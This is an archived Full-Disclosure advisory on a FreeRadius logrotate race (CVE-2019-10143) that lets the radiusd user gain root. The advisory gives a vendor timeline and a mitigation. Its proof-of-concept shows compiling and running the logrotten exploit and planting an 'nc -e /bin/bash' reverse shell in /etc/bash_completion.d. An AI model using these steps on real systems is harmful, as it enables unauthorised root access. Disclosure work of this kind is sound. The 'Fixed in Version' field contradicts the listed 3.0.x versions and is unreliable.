[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [FD] [AIT-SA-20191112-01] CVE-2019-10143: Privilege Escalation via Logrotate in FreeRadius
From:       sec-advisory <sec-advisory () ait ! ac ! at>
Date:       2019-11-15 9:05:43
Message-ID: 3dd3fcd10e644dac83025d94a4364dd8 () ait ! ac ! at
[Download RAW message or body]

# Privilege Escalation via Logrotate in FreeRadius

## Overview
Identifier: AIT-SA-20191112-01
Target: FreeRadius
Vendor: FreeRadius
Version: all versions including 3.0.19
Fixed in Version: 12.2.3, 12.1.8 and 12.0.8
CVE: https://nvd.nist.gov/vuln/detail/CVE-2019-10143
Accessibility: Local
Severity: Low
Author: Wolfgang Hotwagner (AIT Austrian Institute of Technology)

## Summary
[FreeRadius is a modular Open-Source RADIUS suite.](https://freeradius.org/)

## Vulnerability Description
The ownership of the logdirectory "radacct" belongs to user "radiusd". User "radiusd" can \
elevate the privileges to "root" because of an unsafe interaction with logrotate. User \
"radiusd" owns the log directory /var/log/radius/radacct:

```
drwx------. 3 radiusd radiusd 4096 26. Apr 16:01 /var/log/radius/radacct/
```
Log files rotate once a day(or any other frequency if configured) by logrotate as user root. \
The configuration does not use the "su" directive:

```
/var/log/radius/radacct/*/detail {
        monthly
        rotate 4
        nocreate
        missingok
        compress
}
```

Since logrotate is prone to a race-condition(see \
https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition) it is possible for \
user "radiusd" to replace the

directory /var/log/radius/radacct/logdir with a symbolic link to any directory(for example \
/etc/bash_completion.d). logrotate will place the compressed files AS ROOT into \
/etc/bash_completition.d and set the owner and group to "radiusd.radiusd". An attacker could \
simply place a reverse-shell into this file. As soon as root logs in, a reverse shell will be \
executed then.

Details of the race-condition in logrotate can be found at:

*   https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition
*   https://tech.feedyourhead.at/content/abusing-a-race-condition-in-logrotate-to-elevate-privileges
                
*   https://github.com/whotwagner/logrotten

## Proof of Concept
The following example illustrates how an attacker who already gained a shell as user "radiusd", \
can elevate his privileges to "root". After downloading and compiling, the exploit gets \
executed and waits until the next daily run of logrotate.  If the rotation of the log file \
succeeds, a new file that contains the reverse shell payload, will be written into \
/etc/bash_completition.d/ with owner "radiusd". As soon as root logs in, the reverse shell gets \
executed and opens a shell on the attackers netcat listener:

```
radiusd@redhat7:~$ git clone https://github.com/whotwagner/logrotten.git /tmp/logrotten
Cloning into '/tmp/logrotten'...
remote: Enumerating objects: 84, done.
remote: Counting objects: 100% (84/84), done.
remote: Compressing objects: 100% (58/58), done.
remote: Total 84 (delta 35), reused 64 (delta 24), pack-reused 0
Unpacking objects: 100% (84/84), done.
radiusd@redhat7:~$ mkdir -p /var/log/radius/radacct/logdir
radiusd@redhat7:~$ touch /var/log/radius/radacct/logdir/detail
radiusd@redhat7:~$ cd /tmp/logrotten && gcc -o logrotten logrotten.c
radiusd@redhat7:/tmp/logrotten$ ./logrotten -c /var/log/radius/radacct/logdir/detail
Waiting for rotating /var/log/radius/radacct/logdir/detail...
Renamed /var/log/radius/radacct/logdir/detail with /var/log/radius/radacct/logdir/detail2 and \
created symlink to /etc/bash_completion.d Done!
radiusd@redhat7:/tmp/logrotten$ ls -l /etc/bash_completion.d/
total 20
-rw-r--r-- 1 root root 11144 Oct 28  2018 grub
-rw-r--r-- 1 radiusd  radiusd     33 May 12 18:44 detail.1.gz
radiusd@redhat7:/tmp/logrotten$ echo  "if [ \`id -u\` -eq 0 ]; then (/bin/nc -e /bin/bash \
localhost 3333 &); fi" > /etc/bash_completion.d/detail.1.gz radiusd@redhat7:/tmp/logrotten$ nc \
-nvlp 3333 listening on [any] 3333 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 55526
id
uid=0(root) gid=0(root) groups=0(root)
```

## Vulnerable Versions
All versions including 3.0.19

## Tested Versions
Name : freeradius
Architecture: x86_64
Version: 3.0.13
Release: 9.el7_5

## Impact
An attacker who already achieved a valid shell as user "radiusd" could elevate the privileges \
to "root". The fact that another exploit is needed to get a shell lowers the severity from high \
to low.

## Mitigation
Add "su radiusd:radiusd" to all log sections in /etc/logrotate.d/radiusd.
By keeping SELinux in "Enforcing" mode, the "radiusd" user will be limited in the directories \
he can write to.

## References:
*  https://access.redhat.com/security/cve/cve-2019-10143
*  https://nvd.nist.gov/vuln/detail/CVE-2019-10143

## Vendor Contact Timeline

* `2019-05-01` Contacting RedHat
* `2019-05-07` RedHat opens issue at the vendor bugtracker
* `2019-05-23` CVE gets assigned to the issue
* `2019-05-24` FreeRadius is skeptical about the "security" impact
* `2019-11-12` Public disclosure

## Notes
This CVE is disputed because the vendor [stated that there is no known remote code execution in \
freeradius that allows an attacker to gain a shell as user "radiusd"]( \
https://freeradius.org/security/).  CVE's are not only assigned for vulnerabilities but also \
for exposures that allow attacker to have a stronger impact after a successful attack. \
Therefore we believe that it is important to file this issue as a security related bug.

## Advisory URL
https://www.ait.ac.at/ait-sa-20191112-01-privilege-escalation-via-logrotate-in-freeradius

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[prev in list] [next in list] [prev in thread] [next in thread]

Configure | About | News | Add a list | Sponsored by KoreLogic